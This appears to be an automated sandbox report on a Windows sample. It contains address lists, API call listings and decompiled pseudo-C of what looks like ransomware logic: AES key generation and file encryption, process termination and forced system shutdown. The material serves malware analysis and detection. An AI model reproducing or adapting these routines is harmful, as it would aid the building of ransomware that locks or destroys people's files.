                          0x013034ee
                          0x013034f1
                          0x013034f3
                          0x01303526
                          0x01303528
                          0x013035fb
                          0x01303600
                          0x01303601
                          0x01303602
                          0x01303603
                          0x01303604
                          0x01303605
                          0x01303606
                          0x01303607
                          0x01303608
                          0x01303609
                          0x0130360a
                          0x0130360b
                          0x0130360c
                          0x0130360d
                          0x0130360e
                          0x0130360f
                          0x01303610
                          0x01303611
                          0x01303616
                          0x01303617
                          0x01303619
                          0x0130361c
                          0x0130361d
                          0x0130361e
                          0x01303621
                          0x01303626
                          0x0130362b
                          0x0130362e
                          0x01303631
                          0x01303634
                          0x01303636
                          0x01303679
                          0x0130367b
                          0x01303753
                          0x01303758
                          0x01303759
                          0x0130375a
                          0x0130375b
                          0x0130375c
                          0x0130375d
                          0x0130375e
                          0x0130375f
                          0x01303760
                          0x01303763
                          0x01303764
                          0x01303765
                          0x01303767
                          0x01303773
                          0x01303776
                          0x0130377b
                          0x01303782
                          0x01303784
                          0x0130378b
                          0x0130378e
                          0x01303791
                          0x01303796
                          0x0130379b
                          0x013037a2
                          0x013037a9
                          0x013037b2
                          0x01303681
                          0x01303684
                          0x01303687
                          0x0130368d
                          0x0130369a
                          0x013036a5
                          0x013036a7
                          0x013036b3
                          0x013036b5
                          0x013036b7
                          0x013036a9
                          0x013036a9
                          0x013036a9
                          0x0130368f
                          0x0130368f
                          0x0130368f
                          0x013036ba
                          0x013036bd
                          0x013036c1
                          0x013036c9
                          0x013036cf
                          0x013036d2
                          0x013036d9
                          0x013036e0
                          0x013036e3
                          0x013036e4
                          0x01303723
                          0x01303724
                          0x01303725
                          0x0130372a
                          0x0130372a
                          0x01303732
                          0x0130373a
                          0x01303740
                          0x01303750
                          0x013036e6
                          0x013036e6
                          0x013036e8
                          0x013036e9
                          0x013036ea
                          0x013036f2
                          0x013036f9
                          0x01303701
                          0x01303708
                          0x01303708
                          0x01303709
                          0x0130370b
                          0x01303716
                          0x01303720
                          0x01303720
                          0x013036e4
                          0x01303638
                          0x01303638
                          0x0130363e
                          0x01303641
                          0x01303643
                          0x01303646
                          0x01303648
                          0x0130364a
                          0x0130364a
                          0x01303656
                          0x01303661
                          0x01303661
                          0x01303666
                          0x0130366f
                          0x0130366f
                          0x0130352e
                          0x0130352e
                          0x01303531
                          0x01303537
                          0x01303544
                          0x0130354f
                          0x01303551
                          0x0130355d
                          0x0130355f
                          0x01303561
                          0x01303553
                          0x01303553
                          0x01303553
                          0x01303539
                          0x01303539
                          0x01303539
                          0x01303564
                          0x01303567
                          0x0130356b
                          0x01303576
                          0x0130357d
                          0x01303580
                          0x01303585
                          0x0130358c
                          0x0130358f
                          0x01303590
                          0x013035cd
                          0x013035ce
                          0x013035cf
                          0x013035d4
                          0x013035d4
                          0x013035dc
                          0x013035e4
                          0x013035f8
                          0x01303592
                          0x01303592
                          0x01303594
                          0x01303595
                          0x01303596
                          0x0130359e
                          0x013035a5
                          0x013035ad
                          0x013035b4
                          0x013035b4
                          0x013035b5
                          0x013035b7
                          0x013035bc
                          0x013035c2
                          0x013035ca
                          0x013035ca
                          0x01303590
                          0x013034f5
                          0x013034f8
                          0x013034fa
                          0x013034fd
                          0x013034ff
                          0x013034ff
                          0x01303505
                          0x01303505
                          0x0130350a
                          0x01303512
                          0x0130351c
                          0x0130351c
                          0x013034c9
                          0x013034c9
                          0x013034cd
                          0x013034cf
                          0x013034cf
                          0x013034d1
                          0x013034d4
                          0x013034dc
                          0x013034dc
                          0x013033ac
                          0x013033b5
                          0x013033ba
                          0x013033c0
                          0x013033c7
                          0x013033d1
                          0x013033d5
                          0x013033da
                          0x013033dd
                          0x00000000
                          0x013033dd
                          0x013033a6
                          0x01303370
                          0x01303369
                          0x01303066
                          0x00000000
                          0x01303066
                          0x01303007
                          0x01303007
                          0x0130300d
                          0x0130300d
                          0x01303014
                          0x0130301b
                          0x0130301e
                          0x01303021
                          0x01303028
                          0x0130302c
                          0x0130302e
                          0x0130302e
                          0x01303034
                          0x01303039
                          0x0130303d
                          0x0130303f
                          0x01303041
                          0x01303068
                          0x01303068
                          0x01303043
                          0x01303043
                          0x01303043
                          0x0130306a
                          0x0130307c
                          0x01303081
                          0x01303084
                          0x0130308b
                          0x01303090
                          0x0130309c
                          0x013030a6
                          0x013030a9
                          0x013030ac
                          0x013030af
                          0x013030b1
                          0x013030b6
                          0x013030bb
                          0x013030bc
                          0x013030be
                          0x013030c0
                          0x013030c2
                          0x013030c4
                          0x013030c6
                          0x013030c9
                          0x013030cf
                          0x013030d2
                          0x013030d2
                          0x013030d8
                          0x013030db
                          0x013030dd
                          0x013030e0
                          0x013030e5
                          0x013030e8
                          0x013030eb
                          0x013030eb
                          0x013030f2
                          0x013030f5
                          0x013030fa
                          0x013030fa
                          0x013030c0
                          0x013030fd
                          0x013030fd
                          0x01303104
                          0x0130310b
                          0x01303114
                          0x01303119
                          0x0130311a
                          0x0130311c
                          0x0130311e
                          0x01303120
                          0x01303123
                          0x01303129
                          0x01303129
                          0x0130312f
                          0x01303132
                          0x01303134
                          0x01303137
                          0x0130313c
                          0x0130313f
                          0x0130313f
                          0x01303146
                          0x01303149
                          0x0130314e
                          0x0130314e
                          0x01303151
                          0x0130315e
                          0x01303163
                          0x01303168
                          0x01303169
                          0x0130316b
                          0x0130316d
                          0x0130316f
                          0x01303172
                          0x01303178
                          0x01303178
                          0x0130317e
                          0x01303181
                          0x01303183
                          0x01303186
                          0x0130318b
                          0x0130318e
                          0x0130318e
                          0x01303195
                          0x01303198
                          0x0130319d
                          0x013031a6
                          0x013031ae
                          0x013031b0
                          0x013031b6
                          0x013031b9
                          0x013031bf
                          0x013031c2
                          0x013031c6
                          0x00000000
                          0x013031cc
                          0x013031cc
                          0x013031d2
                          0x013031d5
                          0x01302bac
                          0x01302baf
                          0x01302bb8
                          0x01302bbc
                          0x01302bc9
                          0x01302bc9
                          0x01303005
                          0x01302fe8
                          0x01302f63
                          0x01302f4e
                          0x01302e7d
                          0x01302e7d
                          0x01302e83
                          0x00000000
                          0x01302e83
                          0x01302e7b
                          0x01302de7
                          0x01302dbc
                          0x01302d93
                          0x01302d77
                          0x01302b8f
                          0x01302b8f
                          0x01302b95
                          0x01302b98
                          0x01302b9b
                          0x01302b9e
                          0x01302ba1
                          0x00000000
                          0x01302ba1
                          0x01302b8d
                          0x01302a72
                          0x01302a5c
                          0x01302a2f
                          0x01302a06
                          0x013029db
                          0x013029b2
                          0x0130298d
                          0x01302943
                          0x01302943
                          0x01302943
                          0x00000000
                          0x01302943
                          0x0130288c
                          0x0130288c
                          0x00000000
                          0x0130288c
                          0x0130288a
                          0x0130281f
                          0x01302809
                          0x013027dc
                          0x013027b2
                          0x013026d2
                          0x01302689
                          0x0130267f
                          0x01302677
                          0x012faef3
                          0x012facd4
                          0x012facd4
                          0x012facdf
                          0x012face6
                          0x012face7
                          0x012facf5
                          0x012facfa
                          0x012fad01
                          0x00000000
                          0x012fad01
                          0x012facce
                          0x012facaf
                          0x012fac6c

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,00000010), ref: 012FAC04
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000010), ref: 012FAE50
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: File$CopyModuleName
                          • String ID:
                          • API String ID: 4108865673-0
                          • Opcode ID: 0ff06bd36971ad099e9643d60ddf633982c3511e4e061dab35bb33870a697445
                          • Instruction ID: 0bb4c54c4cc8592926d4a591a9c8f955c527b5c88a0f08e13f247154389224f9
                          • Opcode Fuzzy Hash: 0ff06bd36971ad099e9643d60ddf633982c3511e4e061dab35bb33870a697445
                          • Instruction Fuzzy Hash: C3128270D10249DFEB21DFA8C845BAEFBF4FF58314F108269D919A7291E774AA84CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E01308BC0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags, void* _a4) {
                          				long _v8;
                          				char _v16;
                          				signed int _v20;
                          				long* _v24;
                          				long* _v28;
                          				signed int _v32;
                          				long _v36;
                          				short _v52;
                          				intOrPtr _v56;
                          				intOrPtr _v60;
                          				long _v64;
                          				char _v68;
                          				signed int _v72;
                          				long _v76;
                          				short _v92;
                          				intOrPtr _v96;
                          				long _v100;
                          				long _v104;
                          				char _v108;
                          				char _v112;
                          				signed int _v116;
                          				long _v120;
                          				short _v136;
                          				signed int _v140;
                          				long _v144;
                          				short _v160;
                          				long _v164;
                          				long _v168;
                          				long _v172;
                          				char _v176;
                          				signed int _v180;
                          				char _v200;
                          				intOrPtr _v204;
                          				long _v208;
                          				long _v212;
                          				char _v216;
                          				void* _v220;
                          				intOrPtr _v224;
                          				signed int _v228;
                          				long _v232;
                          				short _v248;
                          				long _v252;
                          				intOrPtr _v256;
                          				long _v260;
                          				char _v264;
                          				signed int _v268;
                          				long _v272;
                          				short _v288;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t139;
                          				signed int _t140;
                          				long** _t151;
                          				signed int _t152;
                          				signed int _t154;
                          				long** _t159;
                          				char* _t161;
                          				WCHAR* _t162;
                          				long _t164;
                          				WCHAR* _t166;
                          				void* _t167;
                          				void* _t169;
                          				void* _t176;
                          				signed int _t179;
                          				char _t183;
                          				signed int _t184;
                          				signed int _t186;
                          				signed int _t188;
                          				signed int _t200;
                          				intOrPtr* _t207;
                          				long _t222;
                          				WCHAR* _t223;
                          				void* _t237;
                          				WCHAR* _t241;
                          				intOrPtr _t243;
                          				void* _t244;
                          				signed int _t247;
                          				void* _t248;
                          				void* _t249;
                          
                          				_t237 = __edx;
                          				_push(0xffffffff);
                          				_push(0x1366d15);
                          				_push( *[fs:0x0]);
                          				_t249 = _t248 - 0x110;
                          				_t139 =  *0x13a4018; // 0x39cca9f6
                          				_t140 = _t139 ^ _t247;
                          				_v20 = _t140;
                          				_push(__ebx);
                          				_push(__edi);
                          				_push(_t140);
                          				 *[fs:0x0] =  &_v16;
                          				_t207 = __ecx;
                          				_t243 = E0130A5C0();
                          				_v224 = _t243;
                          				if( *((char*)(__ecx + 0x18)) == 0) {
                          					L39:
                          					 *[fs:0x0] = _v16;
                          					_pop(_t244);
                          					return E0132EA79(_v20 ^ _t247, _t244);
                          				}
                          				if( *((intOrPtr*)(_t243 + 0x20)) == 0 ||  *((intOrPtr*)(_t243 + 0x28)) == 0) {
                          					L38:
                          					 *((char*)(_t243 + 0x2c)) = 0;
                          					goto L39;
                          				} else {
                          					_t8 = _t243 + 0x10; // 0x10
                          					_t241 = _t8;
                          					if(E01309210(__ecx, __ecx, _t241, _t241) != 0) {
                          						goto L38;
                          					}
                          					_v212 = 0;
                          					_v208 = 4;
                          					_v204 = 0x26;
                          					_v8 = 0;
                          					_v216 = 0x1396b08;
                          					E012F60E0(__ecx,  &_v200, _t237, _t241);
                          					_v8 = 1;
                          					 *((intOrPtr*)( *__ecx + 4))();
                          					_v104 = 0;
                          					_v100 = 3;
                          					_v96 = 0x27;
                          					_v8 = 2;
                          					_v108 = 0x1396b2c;
                          					E012F60E0(__ecx,  &_v92, _t237, _t241, _t241,  &_v216);
                          					_v8 = 3;
                          					 *((intOrPtr*)( *__ecx + 4))();
                          					_t151 =  &_v28;
                          					_v28 = 0;
                          					__imp__CryptAcquireContextW(_t151, 0, L"Microsoft Enhanced RSA and AES Cryptographic Provider", 0x18, 0xf0000000,  &_v108, _t241);
                          					if(_t151 == 0) {
                          						L34:
                          						_t152 = _v72;
                          						_v108 = 0x1396b2c;
                          						if(_t152 >= 8) {
                          							_push(2 + _t152 * 2);
                          							E012F56A0(_t207, _t241, _v92);
                          							_t249 = _t249 + 8;
                          						}
                          						_v76 = 0;
                          						_v92 = 0;
                          						_t154 = _v180;
                          						_v72 = 7;
                          						_v108 = 0x1396ae4;
                          						_v216 = 0x1396b08;
                          						if(_t154 >= 8) {
                          							_push(2 + _t154 * 2);
                          							E012F56A0(_t207, _t241, _v200);
                          						}
                          						goto L39;
                          					}
                          					_t159 =  &_v24;
                          					_v24 = 0;
                          					__imp__CryptGenKey(_v28, 0x6610, 1, _t159);
                          					if(_t159 == 0) {
                          						L32:
                          						CryptReleaseContext(_v28, 0);
                          						_t222 = 4;
                          						_t161 =  &_v28;
                          						do {
                          							 *_t161 = 0;
                          							_t161 = _t161 + 1;
                          							_t222 = _t222 - 1;
                          						} while (_t222 != 0);
                          						goto L34;
                          					}
                          					_t162 = _t241;
                          					if(_t241[0xa] >= 8) {
                          						_t162 =  *_t241;
                          					}
                          					_t164 = GetFileAttributesW(_t162) & 0xfffffffe;
                          					_t223 = _t241;
                          					if(_t241[0xa] >= 8) {
                          						_t223 =  *_t241;
                          					}
                          					SetFileAttributesW(_t223, _t164);
                          					_t166 = _t241;
                          					if(_t241[0xa] >= 8) {
                          						_t166 =  *_t241;
                          					}
                          					_t167 = CreateFileW(_t166, 0xc0000000, 0, 0, 3, 0x80, 0);
                          					_v220 = _t167;
                          					if(_t167 != 0xffffffff) {
                          						_t224 =  *((intOrPtr*)(_t243 + 0x28));
                          						if( *((intOrPtr*)(_t243 + 0x28)) != 3) {
                          							_t169 = E01309380(_t207, _t207, _t237, _t241, _v24, _t167, _t224);
                          						} else {
                          							_t169 = E01309740(_t207, _t207, _t237, _t241, _v24, _t167);
                          						}
                          						_push(_v220);
                          						if(_t169 == 0) {
                          							CloseHandle();
                          						} else {
                          							CloseHandle();
                          							_v64 = 0;
                          							_v60 = 2;
                          							_v56 = 0xc;
                          							_v68 = 0x1396adc;
                          							_v36 = 0;
                          							_v32 = 7;
                          							_v52 = 0;
                          							_v8 = 4;
                          							 *((intOrPtr*)( *_t207 + 4))();
                          							_t238 = _t241;
                          							_t176 = E01307020(_t207,  &_v288, _t241, _t241);
                          							_t249 = _t249 + 4;
                          							_v172 = 0;
                          							_v168 = 6;
                          							_v164 = 9;
                          							_v8 = 6;
                          							_v176 = 0x1396aec;
                          							E012F60E0(_t207,  &_v160, _t241, _t241, _t241,  &_v52);
                          							_v8 = 7;
                          							E012F60E0(_t207,  &_v136, _t241, _t241, _t176,  &_v68);
                          							_v112 = 0;
                          							_v8 = 9;
                          							_t179 = _v268;
                          							if(_t179 >= 8) {
                          								_push(2 + _t179 * 2);
                          								E012F56A0(_t207, _t241, _v288);
                          								_t249 = _t249 + 8;
                          							}
                          							_v272 = 0;
                          							_v288 = 0;
                          							_v268 = 7;
                          							 *((intOrPtr*)( *_t207 + 4))( &_v176);
                          							_t183 = _v112;
                          							 *((char*)(_v224 + 0x2c)) = _t183;
                          							if(_t183 != 0) {
                          								_v260 = 0;
                          								_v256 = 2;
                          								_v252 = 0xa;
                          								_v8 = 0xa;
                          								_v264 = 0x1396b34;
                          								E012F60E0(_t207,  &_v248, _t238, _t241);
                          								_v8 = 0xb;
                          								 *((intOrPtr*)( *((intOrPtr*)( *_t207 + 4))))( &_v264, _t241);
                          								_t200 = _v228;
                          								_v264 = 0x1396b34;
                          								if(_t200 >= 8) {
                          									_push(2 + _t200 * 2);
                          									E012F56A0(_t207, _t241, _v248);
                          									_t249 = _t249 + 8;
                          								}
                          								_v232 = 0;
                          								_v228 = 7;
                          								_v248 = 0;
                          								_v264 = 0x1396ae4;
                          							}
                          							_t184 = _v116;
                          							_v176 = 0x1396aec;
                          							if(_t184 >= 8) {
                          								_push(2 + _t184 * 2);
                          								E012F56A0(_t207, _t241, _v136);
                          								_t249 = _t249 + 8;
                          							}
                          							_v120 = 0;
                          							_v136 = 0;
                          							_t186 = _v140;
                          							_v116 = 7;
                          							if(_t186 >= 8) {
                          								_push(2 + _t186 * 2);
                          								E012F56A0(_t207, _t241, _v160);
                          								_t249 = _t249 + 8;
                          							}
                          							_v144 = 0;
                          							_v160 = 0;
                          							_t188 = _v32;
                          							_v140 = 7;
                          							_v176 = 0x1396ae4;
                          							_v68 = 0x1396adc;
                          							if(_t188 >= 8) {
                          								_push(2 + _t188 * 2);
                          								E012F56A0(_t207, _t241, _v52);
                          								_t249 = _t249 + 8;
                          							}
                          							_v36 = 0;
                          							_v32 = 7;
                          							_v52 = 0;
                          							_v68 = 0x1396ae4;
                          						}
                          					}
                          					CryptDestroyKey(_v24);
                          					goto L32;
                          				}
                          			}

                          APIs
                            • Part of subcall function 01309210: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,00000010,00000000,?,?,?,?,?,?,01308C29), ref: 01309253
                            • Part of subcall function 01309210: SetFilePointerEx.KERNEL32(00000000,?,?,?,00000002,?,?,?,?,?,?,01308C29,00000010,39CCA9F6), ref: 01309293
                            • Part of subcall function 01309210: ReadFile.KERNEL32(00000000,?,00000018,?), ref: 013092B7
                            • Part of subcall function 01309210: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,01308C29,00000010,39CCA9F6), ref: 0130935E
                          • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 01308CD2
                          • CryptGenKey.ADVAPI32(00000000,00006610,00000001,?), ref: 01308CF5
                          • GetFileAttributesW.KERNEL32(00000010), ref: 01308D0E
                          • SetFileAttributesW.KERNEL32(00000010,00000000), ref: 01308D23
                          • CreateFileW.KERNEL32(00000010,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 01308D46
                          • CloseHandle.KERNEL32(?,00000000,00000000,?), ref: 01308D8A
                            • Part of subcall function 01309380: GetFileSizeEx.KERNEL32(?,?,?,00000000,00002000,39CCA9F6,00000010,00000000), ref: 013093F9
                            • Part of subcall function 01309380: SetFilePointerEx.KERNEL32(?,?,00000000,01366D55,00000001,?,?,?,00000000,00000000), ref: 013094D7
                            • Part of subcall function 01309380: ReadFile.KERNEL32(?,00000000,00100000,00000000,00000000,?,?,?,00000000,00000000), ref: 013094FD
                            • Part of subcall function 012F60E0: Concurrency::cancel_current_task.LIBCPMT ref: 012F6188
                          • CloseHandle.KERNEL32(?,00000000,00000000,?), ref: 01308FF9
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 01309002
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0130900D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: File$Crypt$CloseHandle$AttributesContextCreatePointerRead$AcquireConcurrency::cancel_current_taskDestroyReleaseSize
                          • String ID: &$'$Microsoft Enhanced RSA and AES Cryptographic Provider
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000,39CCA9F6), ref: 01310CA5
                          • CryptImportKey.ADVAPI32(00000000,00000208,0000002C,00000000,00000001,00000010), ref: 01310D05
                          • CryptSetKeyParam.ADVAPI32(00000010,00000001,?,00000000), ref: 01310D26
                          • CryptSetKeyParam.ADVAPI32(00000010,00000004,?,00000000), ref: 01310D46
                          • CryptDuplicateKey.ADVAPI32(00000010,00000000,00000000,?), ref: 01310D5E
                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000), ref: 01310D85
                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?,?,00000000), ref: 01310DE1
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 01310E12
                          • CryptDestroyKey.ADVAPI32(00000010), ref: 01310E1B
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01310E26
                          Strings
                          • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 01310C93
                          • , xrefs: 01310CDA
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Crypt$ContextDestroyEncryptParam$AcquireDuplicateImportRelease
                          • String ID: $Microsoft Enhanced RSA and AES Cryptographic Provider
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E012FB140(intOrPtr _a4) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				struct _TOKEN_PRIVILEGES _v24;
                          				void* _v28;
                          				signed int _t12;
                          				long _t23;
                          				void* _t26;
                          				signed int _t27;
                          
                          				_t12 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t12 ^ _t27;
                          				_v28 = 0xffffffff;
                          				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                          					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges));
                          					_v24.PrivilegeCount = 1;
                          					_v12 = 2;
                          					AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                          					CloseHandle(_v28);
                          					_t23 = GetLastError();
                          					if(_t23 == 0) {
                          						__imp__InitiateShutdownW(_t23, 0x13836c0, _a4, 4, 2);
                          					}
                          				}
                          				return E0132EA79(_v8 ^ _t27, _t26);
                          			}

                          APIs
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 012FB15D
                          • OpenProcessToken.ADVAPI32(00000000), ref: 012FB164
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 012FB179
                          • AdjustTokenPrivileges.ADVAPI32(FFFFFFFF,00000000,?,00000000,00000000,00000000), ref: 012FB19C
                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 012FB1A5
                          • GetLastError.KERNEL32 ref: 012FB1AB
                          • InitiateShutdownW.ADVAPI32(00000000,013836C0,00000002,00000004,00000002), ref: 012FB1C2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: ProcessToken$AdjustCloseCurrentErrorHandleInitiateLastLookupOpenPrivilegePrivilegesShutdownValue
                          • String ID: SeShutdownPrivilege
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E012FA970(void* __ebx, void* __edi, intOrPtr* _a4) {
                          				int _v8;
                          				char _v16;
                          				signed int _v20;
                          				char _v540;
                          				long _v568;
                          				char _v572;
                          				void* _v576;
                          				void* _v580;
                          				signed int _v584;
                          				int _v588;
                          				char _v604;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t31;
                          				signed int _t32;
                          				struct tagPROCESSENTRY32W* _t39;
                          				intOrPtr* _t42;
                          				void* _t48;
                          				void* _t54;
                          				void* _t59;
                          				void* _t60;
                          				intOrPtr _t65;
                          				signed int _t67;
                          				intOrPtr* _t68;
                          				void* _t70;
                          				intOrPtr* _t73;
                          				void* _t76;
                          				void* _t77;
                          				void* _t78;
                          				signed int _t79;
                          				void* _t80;
                          				void* _t81;
                          				void* _t82;
                          
                          				_push(0xffffffff);
                          				_push(0x1365a80);
                          				_push( *[fs:0x0]);
                          				_t81 = _t80 - 0x24c;
                          				_t31 =  *0x13a4018; // 0x39cca9f6
                          				_t32 = _t31 ^ _t79;
                          				_v20 = _t32;
                          				_push(__ebx);
                          				_push(_t32);
                          				 *[fs:0x0] =  &_v16;
                          				_t73 = _a4;
                          				if( *((intOrPtr*)(_t73 + 0x10)) != 0) {
                          					_t59 = CreateToolhelp32Snapshot(2, 0);
                          					_v580 = _t59;
                          					if(_t59 == 0xffffffff) {
                          						goto L16;
                          					} else {
                          						E013478D0(_t73,  &_v572, 0, 0x228);
                          						_t82 = _t81 + 0xc;
                          						_v576 = 0x22c;
                          						_t39 =  &_v576;
                          						Process32FirstW(_t59, _t39);
                          						_t77 = CloseHandle;
                          						if(_t39 == 0) {
                          							L15:
                          							CloseHandle(_t59);
                          							goto L16;
                          						} else {
                          							do {
                          								_v588 = 0;
                          								_v604 = 0;
                          								_t42 =  &_v540;
                          								_v584 = 7;
                          								_t70 = _t42 + 2;
                          								do {
                          									_t65 =  *_t42;
                          									_t42 = _t42 + 2;
                          								} while (_t65 != 0);
                          								_push(_t42 - _t70 >> 1);
                          								E012F51B0(_t59,  &_v604, _t73, _t77,  &_v540);
                          								_v8 = 0;
                          								_t48 = E012FA4B0(_t59,  &_v604, _t73);
                          								_v8 = 0xffffffff;
                          								_t60 = _t48;
                          								_t67 = _v584;
                          								if(_t67 >= 8) {
                          									_push(2 + _t67 * 2);
                          									E012F56A0(_t60, _t73, _v604);
                          									_t82 = _t82 + 8;
                          								}
                          								if(_t60 == 0) {
                          									goto L14;
                          								} else {
                          									_t78 = OpenProcess(1, 0, _v568);
                          									if(_t78 == 0) {
                          										_t77 = CloseHandle;
                          										goto L14;
                          									} else {
                          										TerminateProcess(_t78, 0);
                          										_t77 = CloseHandle;
                          										CloseHandle(_t78);
                          										_t68 = _t73;
                          										if( *((intOrPtr*)(_t73 + 0x14)) >= 8) {
                          											_t68 =  *_t73;
                          										}
                          										_t54 = E012F8820(_t68,  *((intOrPtr*)(_t73 + 0x10)), 0, "*", 1);
                          										_t82 = _t82 + 0xc;
                          										if(_t54 != 0xffffffff) {
                          											goto L14;
                          										} else {
                          										}
                          									}
                          								}
                          								goto L17;
                          								L14:
                          								_t59 = _v580;
                          							} while (Process32NextW(_t59,  &_v576) != 0);
                          							goto L15;
                          						}
                          					}
                          				}
                          				L17:
                          				 *[fs:0x0] = _v16;
                          				_pop(_t76);
                          				return E0132EA79(_v20 ^ _t79, _t76);
                          			}

                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 012FA9AF
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 012FA9EE
                          • OpenProcess.KERNEL32(00000001,00000000,?,?,?), ref: 012FAA9E
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 012FAAAD
                          • CloseHandle.KERNEL32(00000000), ref: 012FAABA
                          • Process32NextW.KERNEL32(?,0000022C), ref: 012FAAF7
                          • CloseHandle.KERNEL32(00000000), ref: 012FAB06
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 2696918072-0
                          • Opcode ID: aceb8b136bc6426930d51ff01db4ccf1f13d0e6023866cfb795d2554e45bae02
